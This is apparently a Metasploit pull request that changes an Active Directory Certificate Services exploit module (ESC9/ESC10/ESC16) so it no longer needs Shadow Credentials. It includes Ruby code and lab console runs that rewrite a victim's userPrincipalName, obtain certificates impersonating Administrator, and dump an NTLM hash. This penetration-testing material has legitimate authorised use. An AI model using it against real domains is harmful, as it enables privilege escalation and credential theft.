### PR TITLE
Update esc_update_ldap module so shadow creds not required

### DIFF
--- a/documentation/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.md
@@ -36,6 +36,9 @@ The certificate template to issue, e.g., "User".
 ### TARGET_USERNAME
 The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.
 
+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
 ### UPDATE_LDAP_OBJECT
 The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.
 
@@ -133,6 +136,72 @@ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
 [+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
 [+] The operation completed successfully!
 [*] Auxiliary module execution completed
+```
+
+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
 ```
 
 ### ESC9 - Update dnsHostName to `dc2.kerberos.issue`

--- a/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb
+++ b/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb
@@ -204,10 +204,10 @@ class MetasploitModule < Msf::Auxiliary
 
     smbpass = ''
 
-    if datastore['LDAPUsername'] == datastore['TARGET_USERNAME']
-      smbpass = datastore['LDAPPassword']
-    elsif datastore['TARGET_PASSWORD'].present?
+    if datastore['TARGET_PASSWORD'].present?
       smbpass = datastore['TARGET_PASSWORD']
+    elsif datastore['LDAPUsername'] == datastore['TARGET_USERNAME']
+      smbpass = datastore['LDAPPassword']
     else
       # Call the shadow credentials module to add the device and get the cert path
       print_status("Adding shadow credentials for #{datastore['TARGET_USERNAME']}")

--- a/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb
+++ b/modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb
@@ -22,9 +22,10 @@ class MetasploitModule < Msf::Auxiliary
           This module exploits Active Directory Certificate Services (AD CS) template misconfigurations, specifically
           ESC9, ESC10, and ESC16, by updating an LDAP object and requesting a certificate on behalf of a target user.
           The module leverages the auxiliary/admin/ldap/ldap_object_attribute module to update the LDAP object and the
-          admin/ldap/shadow_credentials module to add shadow credentials for the target user. It then uses the
-          admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user and requests a certificate via
-          MS-ICPR. The resulting certificate can be used for various operations, such as authentication.
+          admin/ldap/shadow_credentials module to add shadow credentials for the target user if the target password is
+          not provided. It then uses the admin/kerberos/get_ticket module to retrieve the NTLM hash of the target user
+          and requests a certificate via MS-ICPR. The resulting certificate can be used for various operations, such as
+          authentication.
 
           The module ensures that any changes made by the ldap_object_attribute or shadow_credentials module are
           reverted after execution to maintain system integrity.
@@ -64,7 +65,8 @@ class MetasploitModule < Msf::Auxiliary
       OptString.new('LDAPPassword', [true, 'The password to authenticate with']),
       OptEnum.new('UPDATE_LDAP_OBJECT', [ true, 'Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert.', 'userPrincipalName', %w[userPrincipalName dNSHostName] ]),
       OptString.new('UPDATE_LDAP_OBJECT_VALUE', [ true, 'The account name you wish to impersonate', 'Administrator']),
-      OptString.new('TARGET_USERNAME', [true, 'The username of the target LDAP object (the victim account).'], aliases: ['SMBUser'])
+      OptString.new('TARGET_USERNAME', [true, 'The username of the target LDAP object (the victim account).'], aliases: ['SMBUser']),
+      OptString.new('TARGET_PASSWORD', [false, 'The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticate as the TARGET_USERNAME'], aliases: ['SMBPass'])
     ])
 
     register_advanced_options(
@@ -200,18 +202,29 @@ class MetasploitModule < Msf::Auxiliary
     @original_value = call_ldap_object_module('UPDATE', new_value)
     fail_with(Failure::BadConfig, "The #{datastore['UPDATE_LDAP_OBJECT']} of #{datastore['TARGET_USERNAME']} is already set to #{datastore['UPDATE_LDAP_OBJECT_VALUE']}. After the module completes running it will revert the attribute to it's original value which will cause the certificate produced to throw a KDC_ERR_CLIENT_NAME_MISMATCH when attempting to use it. Try setting the #{datastore['UPDATE_LDAP_OBJECT']} of #{datastore['TARGET_USERNAME']} to anything but #{datastore['UPDATE_LDAP_OBJECT_VALUE']} using the ldap_object_attribute module and then rerun this module.") if @original_value.present? && @original_value.casecmp?(datastore['UPDATE_LDAP_OBJECT_VALUE'])
 
-    # Call the shadow credentials module to add the device and get the cert path
-    print_status("Adding shadow credentials for #{datastore['TARGET_USERNAME']}")
-    @device_id, cert_path = call_shadow_credentials_module('add')
-    hash = automate_get_hash(cert_path, datastore['TARGET_USERNAME'], datastore['LDAPDomain'], datastore['RHOSTS'])
+    smbpass = ''
+
+    if datastore['LDAPUsername'] == datastore['TARGET_USERNAME']
+      smbpass = datastore['LDAPPassword']
+    elsif datastore['TARGET_PASSWORD'].present?
+      smbpass = datastore['TARGET_PASSWORD']
+    else
+      # Call the shadow credentials module to add the device and get the cert path
+      print_status("Adding shadow credentials for #{datastore['TARGET_USERNAME']}")
+      @device_id, cert_path = call_shadow_credentials_module('add')
+      smbpass = automate_get_hash(cert_path, datastore['TARGET_USERNAME'], datastore['LDAPDomain'], datastore['RHOSTS'])
+    end
+
     with_ipc_tree do |opts|
       datastore['SMBUser'] = datastore['TARGET_USERNAME']
-      datastore['SMBPass'] = hash
+      datastore['SMBPass'] = smbpass
       request_certificate(opts)
     end
   ensure
-    print_status('Removing shadow credential')
-    call_shadow_credentials_module('remove', device_id: @device_id)
+    unless @device_id.nil?
+      print_status('Removing shadow credential')
+      call_shadow_credentials_module('remove', device_id: @device_id)
+    end
     print_status('Reverting ldap object')
     revert_ldap_object
   end


### PR DESCRIPTION
Updates `auxiliary/admin/dcerpc/esc_update_ldap_object` to work when using Shadow Credentials is not necessary. This accounts for scenarios where:
1. The operator is attempting to update their own LDAP object (`LDAPUsername` == `TARGET_USERNAME`) in order to exploit one of the ESC misconfigurations. 
2. The operator already has the password for the `TARGET_USERNAME` (a `TARGET_PASSWORD` datastore option has been added)

## Verification

Test the following three scenarios. When verifying, look to ensure the `Certificate UPN` in the output is getting set to the value defined in the  `UPDATE_LDAP_OBJECT_VALUE`. 
ex: `Certificate UPN: Administrator`. Also ensure the module is cleaning up properly, `UPDATE_LDAP_OBJECT` is getting reset properly and the Shadow Credential is being removed if it gets created. 

### Set `TARGET_PASSWORD` (the password for the `TARGET_USERNAME` ) see that the Shadow Credentials code path does not get run and the module still runs successfully
```
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
```

### Unset `TARGET_PASSWORD` and set `TARGET_USERNAME` to the same user as `LDAPUsername` and see that the Shadow Credentials code path does not get run and the module still runs successfully

```
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > unset TARGET_PASSWORD
Unsetting TARGET_PASSWORD...
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set TARGET_USERNAME user1
TARGET_USERNAME => user1
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user1              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: user1@kerberos.issue
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140137_default_172.16.199.200_windows.ad.cs_629741.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user1's userPrincipalName: Administrator
[*] Attempting to update userPrincipalName for CN=user1,CN=Users,DC=kerberos,DC=issue to user1@kerberos.issue...
[+] Successfully updated CN=user1,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user1@kerberos.issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
```
### Confirm the original exploit path still works. Where `LDAPUsername` != `TARGET_USERNAME`, `TARGET_PASSWORD` is unset and the Shadow Credentials method is used and is cleaned up afterwards

```
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
target_username => user2
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options

Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):

   Name                      Current Setting    Required  Description
   ----                      ---------------    --------  -----------
   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
   ALT_DNS                                      no        Alternative certificate DNS
   ALT_SID                                      no        Alternative object SID
   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                        kerberos-DC2-CA    yes       The target certificate authority
   CERT_TEMPLATE             User               yes       The certificate template
   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
   LDAPPassword              N0tpassword!       yes       The password to authenticate with
   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
   SSL                       false              no        Enable SSL on the LDAP connection
   TARGET_PASSWORD                              no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate


   Used when making a new connection via RHOSTS:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   445              no        The target port (TCP)


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[*] 172.16.199.200:445 - Adding shadow credentials for user2
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[*] Certificate stored at: /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_windows.ad.cs_922206.pfx
[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
[*] 172.16.199.200:445 - Getting hash for user2
[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
[+] 172.16.199.200:88 - Received a valid TGT-Response
[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_107720.bin
[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
[+] 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20250923140515_default_172.16.199.200_mit.kerberos.cca_991115.bin
[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923140518_default_172.16.199.200_windows.ad.cs_992950.pfx
[*] 172.16.199.200:445 - Removing shadow credential
[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] Deleted entry with device ID b9ed6cbe-22f8-28f9-85af-b059e73aa7e8
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
```